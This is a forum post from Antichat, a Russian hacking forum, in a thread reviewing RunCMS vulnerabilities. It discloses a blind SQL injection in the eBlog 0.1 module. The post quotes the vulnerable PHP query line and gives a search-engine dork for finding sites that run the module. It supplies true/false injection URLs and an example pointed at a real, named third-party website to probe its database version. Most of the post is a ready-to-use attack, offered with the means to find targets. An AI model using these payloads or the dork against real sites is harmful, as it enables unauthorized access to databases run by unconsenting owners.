Форум АНТИЧАТ - [ Обзор уязвимостей RunCMS ]

#21

16.12.2008, 01:17

Ded MustD!e

Members of Antichat - Level 5

Регистрация: 23.08.2007

Сообщений: 417

Провел на форуме:
14324684

Репутация: 3908

RunCMS Module eBlog 0.1 Blind-SQL

Уязвимый продукт: Module eBlog
Версия: <= 0.1
Линк: http://www.runcms.ru/modules/files/showfile.php?lid=165
Дорк: "inurl:modules/eblog/"

Blind-SQL

Уязвимость в файле index.php.
Уязвимый кусок кода:

PHP код:


		
			
$result = $db->query("select cat_blogid from ".$db->prefix(eblog_cat)." where cat_id=$cat") or $eh->show("0013");

Exploit:

Код:

true: /modules/eblog/index.php?cat=1+and+1=1
false: /modules/eblog/index.php?cat=1+and+1=2

Example:

Код:

true: http://utahvalleyonline.com/ourplace/modules/eblog/index.php?cat=12+and+substring(version(),1,1)=5
false: http://utahvalleyonline.com/ourplace/modules/eblog/index.php?cat=12+and+substring(version(),1,1)=4

__________________
Feci, quod potui. Faciant meliora potentes.

Похожие темы

Тема

Автор

Раздел

Ответов

Последнее сообщение

[Обзор уязвимостей в форумных движках]

Grey

Форумы

28.12.2009 20:03